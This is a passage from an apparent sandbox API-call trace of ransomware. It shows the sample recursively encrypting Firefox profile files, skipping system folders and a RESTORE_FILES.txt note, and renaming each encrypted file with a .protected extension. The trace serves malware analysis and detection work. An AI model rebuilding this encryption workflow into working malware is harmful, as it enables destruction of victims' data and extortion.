lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.599] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.599] CloseHandle (hObject=0x154) returned 1 [0090.599] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.protected") returned 118 [0090.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite.protected")) returned 1 [0090.600] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.600] lstrcmpiW (lpString1="extensions.ini", lpString2="Windows") returned -1 [0090.600] lstrcmpiW (lpString1="extensions.ini", lpString2="Program Files") returned -1 [0090.600] lstrcmpiW (lpString1="extensions.ini", lpString2="Program Files (x86)") returned -1 [0090.600] lstrcmpiW (lpString1="extensions.ini", lpString2="$Recycle.bin") returned 1 [0090.600] lstrcmpiW (lpString1="extensions.ini", lpString2="System Volume Information") returned -1 [0090.600] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned 106 [0090.600] StrStrIW (lpFirst="extensions.ini", lpSrch=".protected") returned 0x0 [0090.600] lstrcmpW (lpString1="extensions.ini", lpString2="RESTORE_FILES.txt") returned -1 [0090.600] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.601] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned 106 [0090.602] StrStrW (lpFirst="extensions.ini", lpSrch=".txt") returned 0x0 [0090.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned 106 [0090.602] StrStrW (lpFirst="extensions.ini", lpSrch=".rar") returned 0x0 [0090.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned 106 [0090.602] StrStrW (lpFirst="extensions.ini", lpSrch=".zip") returned 0x0 [0090.602] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x8d, lpOverlapped=0x0) returned 1 [0090.603] 
SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffff73, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.603] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x8d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x8d, lpOverlapped=0x0) returned 1 [0090.603] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.603] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.603] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.603] CloseHandle (hObject=0x154) returned 1 [0090.603] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.protected") returned 116 [0090.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini.protected")) returned 1 [0090.605] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 
[0090.605] lstrcmpiW (lpString1="extensions.sqlite", lpString2="Windows") returned -1 [0090.605] lstrcmpiW (lpString1="extensions.sqlite", lpString2="Program Files") returned -1 [0090.605] lstrcmpiW (lpString1="extensions.sqlite", lpString2="Program Files (x86)") returned -1 [0090.605] lstrcmpiW (lpString1="extensions.sqlite", lpString2="$Recycle.bin") returned 1 [0090.605] lstrcmpiW (lpString1="extensions.sqlite", lpString2="System Volume Information") returned -1 [0090.605] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned 109 [0090.605] StrStrIW (lpFirst="extensions.sqlite", lpSrch=".protected") returned 0x0 [0090.605] lstrcmpW (lpString1="extensions.sqlite", lpString2="RESTORE_FILES.txt") returned -1 [0090.605] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.605] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned 109 [0090.606] StrStrW (lpFirst="extensions.sqlite", lpSrch=".txt") returned 0x0 [0090.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned 109 [0090.606] StrStrW (lpFirst="extensions.sqlite", lpSrch=".rar") returned 0x0 [0090.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned 109 [0090.606] StrStrW (lpFirst="extensions.sqlite", lpSrch=".zip") returned 0x0 [0090.606] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.620] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.621] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.621] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.621] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.622] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.622] CloseHandle (hObject=0x154) returned 1 [0090.622] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.protected") returned 119 [0090.622] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite.protected")) returned 1 [0090.623] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.623] lstrcmpiW (lpString1="indexedDB", lpString2="Windows") returned -1 [0090.623] lstrcmpiW (lpString1="indexedDB", lpString2="Program Files") returned -1 [0090.623] lstrcmpiW (lpString1="indexedDB", lpString2="Program Files (x86)") returned -1 [0090.623] lstrcmpiW (lpString1="indexedDB", lpString2="$Recycle.bin") returned 1 [0090.623] lstrcmpiW (lpString1="indexedDB", lpString2="System Volume Information") returned -1 [0090.623] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 101 [0090.623] lstrcmpW (lpString1="indexedDB", lpString2=".") returned 1 [0090.624] lstrcmpW (lpString1="indexedDB", lpString2="..") returned 1 [0090.624] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*") returned 103 [0090.624] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.624] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0090.625] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.625] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.625] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.625] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.625] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\.") returned 103 [0090.625] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.625] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.625] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.625] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.625] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.625] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.625] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.625] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\..") returned 104 [0090.625] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.625] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.625] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.625] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="Windows") returned -1 [0090.625] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="Program Files") returned -1 [0090.625] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="Program Files (x86)") returned -1 [0090.625] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="$Recycle.bin") returned 1 
[0090.625] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="System Volume Information") returned -1 [0090.625] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 121 [0090.625] lstrcmpW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0090.625] lstrcmpW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0090.625] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*") returned 123 [0090.625] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0090.625] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.625] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.626] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.626] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.626] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.626] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.") returned 123 [0090.626] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.626] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0090.626] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.626] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.626] lstrcmpiW 
(lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.626] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.626] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.626] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\..") returned 124 [0090.626] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.626] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.626] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0090.626] lstrcmpiW (lpString1=".metadata", lpString2="Windows") returned -1 [0090.626] lstrcmpiW (lpString1=".metadata", lpString2="Program Files") returned -1 [0090.626] lstrcmpiW (lpString1=".metadata", lpString2="Program Files (x86)") returned -1 [0090.626] lstrcmpiW (lpString1=".metadata", lpString2="$Recycle.bin") returned 1 [0090.626] lstrcmpiW (lpString1=".metadata", lpString2="System Volume Information") returned -1 [0090.626] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 131 [0090.626] StrStrIW (lpFirst=".metadata", lpSrch=".protected") returned 0x0 [0090.626] lstrcmpW (lpString1=".metadata", lpString2="RESTORE_FILES.txt") returned -1 [0090.626] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0090.626] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0090.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 131 [0090.628] StrStrW (lpFirst=".metadata", lpSrch=".txt") returned 0x0 [0090.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 131 [0090.628] StrStrW (lpFirst=".metadata", lpSrch=".rar") returned 0x0 [0090.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 131 [0090.628] StrStrW (lpFirst=".metadata", lpSrch=".zip") returned 0x0 [0090.628] ReadFile (in: hFile=0x15c, lpBuffer=0xce0048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xce0048*, lpNumberOfBytesRead=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0090.628] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.628] WriteFile (in: hFile=0x15c, lpBuffer=0xce0048*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xce0048*, lpNumberOfBytesWritten=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0090.628] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.629] WriteFile (in: 
hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0090.629] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0090.629] CloseHandle (hObject=0x15c) returned 1 [0090.630] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata.protected") returned 141 [0090.630] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\.metadata.protected")) returned 1 [0090.630] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0090.631] lstrcmpiW (lpString1="idb", lpString2="Windows") returned -1 [0090.631] lstrcmpiW (lpString1="idb", lpString2="Program Files") returned -1 [0090.631] lstrcmpiW (lpString1="idb", lpString2="Program Files (x86)") returned -1 [0090.631] lstrcmpiW (lpString1="idb", lpString2="$Recycle.bin") returned 1 [0090.631] lstrcmpiW (lpString1="idb", lpString2="System Volume Information") returned -1 [0090.631] wnsprintfW (in: 
pszDest=0x513c88, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 125 [0090.631] lstrcmpW (lpString1="idb", lpString2=".") returned 1 [0090.631] lstrcmpW (lpString1="idb", lpString2="..") returned 1 [0090.631] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*") returned 127 [0090.631] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0090.632] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.632] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.632] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.632] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.632] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.632] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\.") returned 127 [0090.632] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.632] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0090.632] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.633] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.633] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.633] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.633] 
lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.633] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\..") returned 128 [0090.633] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.633] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.633] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0090.633] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="Windows") returned -1 [0090.633] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="Program Files") returned -1 [0090.633] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="Program Files (x86)") returned -1 [0090.633] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="$Recycle.bin") returned 1 [0090.633] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="System Volume Information") returned -1 [0090.633] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 144 [0090.633] lstrcmpW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0090.633] lstrcmpW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0090.633] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*") returned 146 [0090.633] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 